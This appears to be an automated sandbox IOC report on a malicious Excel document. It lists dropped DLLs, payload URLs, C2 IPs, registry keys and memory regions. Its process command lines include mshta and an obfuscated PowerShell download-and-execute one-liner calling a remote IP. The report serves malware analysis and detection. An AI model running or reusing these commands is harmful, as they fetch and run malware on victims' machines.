IOC Report

loading gif

Files

File Path
Type
Category
Malicious
DOCUMENT_2801.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
initial sample
malicious
C:\ProgramData\Milossd.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\DOCUMENT_2801.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\36E8.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DFEE598E85DD6B8B75.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF08D13411F7037F4.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msnu (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AE0RRM4GV8COLKP8I7YS.temp
data
dropped
C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
malicious
C:\Windows\System32\cmd.exe
cmd
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.172/ee/ss/se.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
malicious
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3
unknown
malicious
http://engaz.shop/wp-content/MOllqUm2nb/PE3
unknown
malicious
http://91.240.118.172/ee/ss/se.htmlngs
unknown
malicious
http://engaz.shop/wp-content/MOllqUm2nb/
unknown
malicious
https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3
unknown
malicious
http://91.240.118.172/ee/ss/se.html
91.240.118.172
malicious
http://3-fasen.com/wp-content/3Bl0hBbW/PE3
unknown
malicious
http://91.240.11
unknown
malicious
https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/
unknown
malicious
http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1
unknown
malicious
https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/
unknown
malicious
http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3
unknown
malicious
https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3
unknown
malicious
http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3
unknown
malicious
https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3
unknown
malicious
http://tamiladsense.com/wp-inclu
unknown
malicious
http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/
unknown
malicious
http://imaginariumstore.fun/ncsb
unknown
malicious
http://91.240.118.172/ee/ss/se.pngPE3
unknown
malicious
https://mypurealsystem.com/App_Start/Rhh8lKO/PE3
unknown
malicious
https://ecobaby.pi-dh.com/Serend
unknown
malicious
http://3-fasen.com/wp-content/3B
unknown
malicious
http://onexone.elementor.cloud/c
unknown
malicious
http://3-fasen.com/wp-content/3Bl0hBbW/
unknown
malicious
http://engaz.shop/wp-content/MOl
unknown
malicious
https://mypurealsystem.com/App_Start/Rhh8lKO/
unknown
malicious
https://vn.minino.com/wp-admin/c3WQa/PE3
unknown
malicious
http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html
unknown
malicious
https://vn.minino.com/wp-admin/c3WQa/
unknown
malicious
http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/
136.0.111.15
malicious
http://91.240.118.172
unknown
malicious
http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3
unknown
malicious
http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/
unknown
malicious
http://91.240.118.172/ee/ss/se.htmli
unknown
malicious
http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/
unknown
malicious
http://tamiladsense.com
unknown
malicious
http://tunbridgeservices.com/jfoeqhxz/zOX0/
unknown
malicious
http://91.240.118.172/ee/ss/se.htmlfunction
unknown
malicious
http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/
unknown
malicious
http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3
unknown
malicious
http://91.240.118.172/ee/ss/se.png
91.240.118.172
malicious
http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3
unknown
malicious
https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/
unknown
malicious
https://vn.minin
unknown
http://ocsp.entrust.net03
unknown
https://lastregaristorante.com/w
unknown
http://91.240.118.17f
unknown
https://oculusvisioncare.com/wp-
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://tunbridgeservices.com/jfo
unknown
https://139.196.72.155/R
unknown
http://91.240.118.172/ee/ss/se.p
unknown
https://mypurealsystem.com/App_S
unknown
https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwG
unknown
http://ocsp.entrust.net0D
unknown
http://servername/isapibackend.dll
unknown
http://3-fasen.c
unknown
https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwG
unknown
http://devbhoomigaushala.org/Get
unknown
https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXM
unknown
http://crl.entrust.net/server1.crl0
unknown
https://74.207.230.120/O
unknown
https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe
unknown
https://139.196.72.155/
unknown
http://www.protware.com
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://onexone.e
unknown
https://vn.minino.com/wp-admin/c
unknown
http://www.piriform.com/ccleaner
unknown
https://secure.comodo.com/CPS0
unknown
http://91.240.11x
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://engaz.sho
unknown
https://74.207.230.120/d
unknown
There are 65 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
tamiladsense.com
136.0.111.15
malicious

IPs

IP
Domain
Country
Malicious
207.148.81.119
unknown
United States
malicious
104.131.62.48
unknown
United States
malicious
198.199.98.78
unknown
United States
malicious
194.9.172.107
unknown
unknown
malicious
59.148.253.194
unknown
Hong Kong
malicious
74.207.230.120
unknown
United States
malicious
103.41.204.169
unknown
Indonesia
malicious
85.214.67.203
unknown
Germany
malicious
191.252.103.16
unknown
Brazil
malicious
168.197.250.14
unknown
Argentina
malicious
185.148.168.15
unknown
Germany
malicious
66.42.57.149
unknown
United States
malicious
139.196.72.155
unknown
China
malicious
217.182.143.207
unknown
France
malicious
136.0.111.15
tamiladsense.com
United States
malicious
203.153.216.46
unknown
Indonesia
malicious
159.69.237.188
unknown
Germany
malicious
116.124.128.206
unknown
Korea Republic of
malicious
37.59.209.141
unknown
France
malicious
78.46.73.125
unknown
Germany
malicious
210.57.209.142
unknown
Indonesia
malicious
185.148.168.220
unknown
Germany
malicious
54.37.228.122
unknown
France
malicious
185.168.130.138
unknown
Ukraine
malicious
190.90.233.66
unknown
Colombia
malicious
142.4.219.173
unknown
Canada
malicious
54.38.242.185
unknown
France
malicious
195.154.146.35
unknown
France
malicious
195.77.239.39
unknown
Spain
malicious
78.47.204.80
unknown
Germany
malicious
118.98.72.86
unknown
Indonesia
malicious
37.44.244.177
unknown
Germany
malicious
91.240.118.172
unknown
unknown
malicious
62.171.178.147
unknown
United Kingdom
malicious
128.199.192.135
unknown
United Kingdom
malicious
There are 25 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
)y#
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2D7C8
2D7C8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
;}#
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3401C
3401C
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34AD5
34AD5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 61 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2D81000
unkown
page execute read
malicious
1E0000
trusted library allocation
page execute and read and write
malicious
2CF1000
trusted library allocation
page execute read
malicious
26A1000
trusted library allocation
page execute read
malicious
810000
trusted library allocation
page execute and read and write
malicious
2B1000
trusted library allocation
page execute read
malicious
731000
trusted library allocation
page execute read
malicious
3091000
unkown
page execute read
malicious
E81000
trusted library allocation
page execute read
malicious
CE0000
trusted library allocation
page execute and read and write
malicious
2B30000
trusted library allocation
page execute and read and write
malicious
2730000
trusted library allocation
page execute and read and write
malicious
200000
trusted library allocation
page execute and read and write
malicious
2DB0000
stack
page execute and read and write
malicious
2E41000
trusted library allocation
page execute read
malicious
2B61000
trusted library allocation
page execute read
malicious
2830000
trusted library allocation
page execute and read and write
malicious
2E11000
trusted library allocation
page execute read
malicious
7D0000
trusted library allocation
page execute and read and write
malicious
8E0000
trusted library allocation
page execute and read and write
malicious
270000
trusted library allocation
page execute and read and write
malicious
2EB0000
trusted library allocation
page execute and read and write
malicious
2E41000
trusted library allocation
page execute read
malicious
1C0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
601000
trusted library allocation
page execute read
malicious
370000
trusted library allocation
page execute and read and write
malicious
25B1000
trusted library allocation
page execute read
malicious
2A11000
trusted library allocation
page execute read
malicious
3C0000
trusted library allocation
page execute and read and write
malicious
2800000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
3031000
trusted library allocation
page execute read
malicious
700000
trusted library allocation
page execute and read and write
malicious
8B1000
trusted library allocation
page execute read
malicious
341000
trusted library allocation
page execute read
malicious
29A0000
trusted library allocation
page execute and read and write
malicious
291000
trusted library allocation
page execute read
malicious
2FC0000
trusted library allocation
page execute and read and write
malicious
2A90000
trusted library allocation
page execute and read and write
malicious
28D0000
trusted library allocation
page execute and read and write
malicious
26D1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
C21000
trusted library allocation
page execute read
malicious
27D1000
trusted library allocation
page execute read
malicious
2DB0000
trusted library allocation
page execute and read and write
malicious
2801000
trusted library allocation
page execute read
malicious
2881000
trusted library allocation
page execute read
malicious
3061000
trusted library allocation
page execute read
malicious
2B01000
trusted library allocation
page execute read
malicious
2900000
trusted library allocation
page execute and read and write
malicious
27D0000
trusted library allocation
page execute and read and write
malicious
831000
trusted library allocation
page execute read
malicious
271000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2D10000
stack
page execute and read and write
malicious
27A0000
trusted library allocation
page execute and read and write
malicious
860000
trusted library allocation
page execute and read and write
malicious
2761000
trusted library allocation
page execute read
malicious
880000
trusted library allocation
page execute and read and write
malicious
2F70000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2EE1000
trusted library allocation
page execute read
malicious
2E91000
trusted library allocation
page execute read
malicious
2400000
trusted library allocation
page execute and read and write
malicious
2D50000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
E50000
trusted library allocation
page execute and read and write
malicious
2901000
trusted library allocation
page execute read
malicious
D81000
trusted library allocation
page execute read
malicious
3086000
trusted library allocation
page read and write
40FA000
heap
page read and write
57A8000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
3FFE000
stack
page read and write
1B1000
heap
page read and write
3145000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
29A4000
trusted library allocation
page read and write
3394000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
40F4000
heap
page read and write
1EB000
stack
page read and write
38B3000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
33B1000
trusted library allocation
page read and write
5A63000
heap
page read and write
55E4000
heap
page read and write
8D9E000
trusted library allocation
page read and write
368E000
unkown
page read and write
DE0000
heap
page read and write
3228000
trusted library allocation
page read and write
3674000
unkown
page read and write
40FA000
heap
page read and write
57B4000
trusted library allocation
page read and write
BE0000
heap
page read and write
1A0000
heap
page read and write
31E3000
trusted library allocation
page read and write
1BD000
stack
page read and write
33C6000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
205D000
stack
page read and write
10000
heap
page read and write
10000000
unkown
page readonly
28D0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
540000
heap
page read and write
2E65000
trusted library allocation
page read and write
1CF000
heap
page read and write
2FD0000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
40D9000
heap
page read and write
3B0000
remote allocation
page read and write
2AA4000
trusted library allocation
page read and write
278000
heap
page read and write
2AE8000
trusted library allocation
page read and write
29A000
heap
page read and write
106000
heap
page read and write
40AF000
heap
page read and write
374E000
trusted library allocation
page read and write
CA0000
heap
page read and write
33A3000
trusted library allocation
page read and write
307E000
trusted library allocation
page read and write
2F06000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
230F000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
40EF000
heap
page read and write
57B0000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
2B15000
heap
page read and write
1C54000
heap
page read and write
930000
heap
page read and write
1CF000
heap
page read and write
7FF00122000
trusted library allocation
page execute and read and write
22D0000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
2830000
heap
page read and write
1D5000
stack
page read and write | page guard
10046000
unkown
page readonly
3175000
trusted library allocation
page read and write
151000
heap
page read and write
23F0000
heap
page read and write
37FF000
trusted library allocation
page read and write
3450000
heap
page read and write
885E000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
5AAD000
heap
page read and write
3175000
trusted library allocation
page read and write
450000
trusted library section
page read and write
2AE0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
38CC000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
2D15000
trusted library allocation
page read and write
5593000
heap
page read and write
315D000
trusted library allocation
page read and write
2A35000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
40F8000
heap
page read and write
38AF000
trusted library allocation
page read and write
5AB8000
heap
page read and write
7FF00270000
trusted library allocation
page read and write
D80000
trusted library allocation
page read and write
28FE000
stack
page read and write
40FD000
heap
page read and write
8D6E000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
3C07000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
2E4E000
stack
page read and write | page guard
1005A000
unkown
page readonly
57C3000
trusted library allocation
page read and write
10000
heap
page read and write
6C0000
heap
page read and write
2AD6000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
378E000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
1005A000
unkown
page readonly
3394000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
40F6000
heap
page read and write
38B6000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
309D000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
3157000
trusted library allocation
page read and write
314B000
trusted library allocation
page read and write
33CC000
trusted library allocation
page read and write
7FF00030000
trusted library allocation
page read and write
828000
heap
page read and write
2AEF000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
55D3000
heap
page read and write
885E000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
3726000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
5A63000
heap
page read and write
5AB8000
heap
page read and write
2A08000
trusted library allocation
page read and write
7FF0003C000
trusted library allocation
page execute and read and write
40BF000
heap
page read and write
57AB000
trusted library allocation
page read and write
40F1000
heap
page read and write
2E3E000
stack
page read and write
2AE8000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
40F1000
heap
page read and write
314D000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page read and write
720000
heap
page read and write
38D0000
trusted library allocation
page read and write
506000
heap
page read and write
33A1000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
5A53000
heap
page read and write
30AD000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
2FD000
heap
page read and write
342E000
trusted library allocation
page read and write
31EF000
trusted library allocation
page read and write
143000
heap
page read and write
1B1000
heap
page read and write
2AC8000
trusted library allocation
page read and write
210000
heap
page read and write
3679000
trusted library allocation
page read and write
33C3000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
1CA53000
heap
page read and write
3791000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
7FF001F7000
trusted library allocation
page read and write
2BCD000
stack
page read and write
530000
heap
page read and write
1C04E000
stack
page read and write
3640000
trusted library allocation
page read and write
4BC000
heap
page read and write
330B000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
4068000
heap
page read and write
38B6000
trusted library allocation
page read and write
5A2A000
heap
page read and write
88BC000
stack
page read and write
344F000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
7FF000F0000
trusted library allocation
page read and write
27F6000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
55C7000
heap
page read and write
57AB000
trusted library allocation
page read and write
10000
heap
page read and write
33B7000
trusted library allocation
page read and write
318A000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
230000
trusted library allocation
page read and write
3153000
trusted library allocation
page read and write
2E3000
heap
page read and write
2A30000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
2E35000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
2B6000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
14B000
stack
page read and write
E32000
heap
page read and write
3175000
trusted library allocation
page read and write
40FD000
heap
page read and write
E10000
heap
page read and write
40FD000
heap
page read and write
3394000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
680000
heap
page read and write
90FE000
trusted library allocation
page read and write
1AC000
heap
page read and write
2E4F000
stack
page read and write
28000
heap
page read and write
40BF000
heap
page read and write
326000
heap
page read and write
57B0000
trusted library allocation
page read and write
407B000
heap
page read and write
770000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
31BB000
trusted library allocation
page read and write
8F0000
heap
page read and write
3149000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
506000
heap
page read and write
168000
heap
page read and write
2AC8000
trusted library allocation
page read and write
845E000
trusted library allocation
page read and write
490000
heap
page read and write
57A8000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
25A0000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
40EC000
heap
page read and write
38AF000
trusted library allocation
page read and write
33C8000
trusted library allocation
page read and write
10057000
unkown
page read and write
30B9000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
578000
heap
page read and write
57C3000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
1FCF000
stack
page read and write
4066000
heap
page read and write
3085000
trusted library allocation
page read and write
38D0000
